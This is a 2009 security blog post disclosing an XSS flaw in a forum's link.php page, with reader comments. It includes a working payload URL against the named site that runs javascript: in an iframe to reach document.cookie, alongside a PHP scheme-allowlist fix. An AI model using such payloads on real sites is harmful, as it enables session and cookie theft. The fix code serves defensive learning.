Jul 31

Nohack XSS

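woyigui, 14:41, Network Security, Comments (3), Trackbacks (0), Views (1662), Via: original to this site
The link.php page is not part of the stock Dz forum; nohack wrote it themselves. The parameter is processed with the htmlspecialchars function, and gpc is enabled in the php.ini configuration, so XSS by closing the attribute is not possible. But nohack forgot that a javascript: pseudo-protocol URL placed in a resource request will be executed: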
http://www.nohack.cn/bbs/link.php?link=javascript:alert(document.cookie)

Page content:
<iframe id="url_mainframe" frameborder="0" scrolling="yes" name="main" src="javascript:alert(document.cookie)" style="height: 100%; visibility: inherit; width: 100%; z-index: 1;overflow: visible;"></iframe>

There are still a lot of cases like this!!
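
One way to close this hole, as an added example that is not nohack's code: check the URL scheme against an allowlist before the value reaches the iframe src, and keep htmlspecialchars for attribute escaping. The function names safe_frame_src() and render_frame() are hypothetical, and the sample inputs are constructed.

```php
<?php
// Added example (not nohack's code). safe_frame_src() and render_frame()
// are hypothetical names; the sample inputs below are constructed.

// Returns the URL if it is an absolute http(s) URL, otherwise null.
function safe_frame_src(string $link): ?string
{
    // Browsers strip tabs/newlines and leading whitespace/control
    // characters before resolving the scheme, so reject them outright
    // instead of trying to normalise.
    if (preg_match('/[\x00-\x20\x7f]/', $link)) {
        return null;
    }
    $parts = parse_url($link);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null; // relative, scheme-less or malformed
    }
    // Scheme allowlist: javascript:, data:, vbscript: etc. never match.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return $link;
}

function render_frame(string $link): string
{
    $src = safe_frame_src($link);
    if ($src === null) {
        return '<p>Invalid link.</p>';
    }
    // Escaping is still needed to stop attribute breakout; it just is
    // not sufficient on its own.
    return '<iframe id="url_mainframe" src="'
        . htmlspecialchars($src, ENT_QUOTES, 'UTF-8') . '"></iframe>';
}

// Constructed inputs: the payload from the post, a mixed-case variant
// with an embedded tab, and an ordinary link.
$samples = [
    'javascript:alert(document.cookie)',
    "JaVa\tScript:alert(1)",
    'http://www.example.com/thread.php?tid=1&page=2',
];
foreach ($samples as $s) {
    // htmlspecialchars() alone leaves the first sample unchanged.
    echo htmlspecialchars($s, ENT_QUOTES, 'UTF-8'), ' => ', render_frame($s), "\n";
}
```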
无心
2009/08/12 16:08
Haha, 空气 fixes vulnerabilities pretty quickly~~~~
sH
2009/07/31 16:42
Bump!
randsafe
2009/07/31 15:37
鬼友, what have you been studying lately?
woyigui replied on 2009/07/31 16:06
who are you ?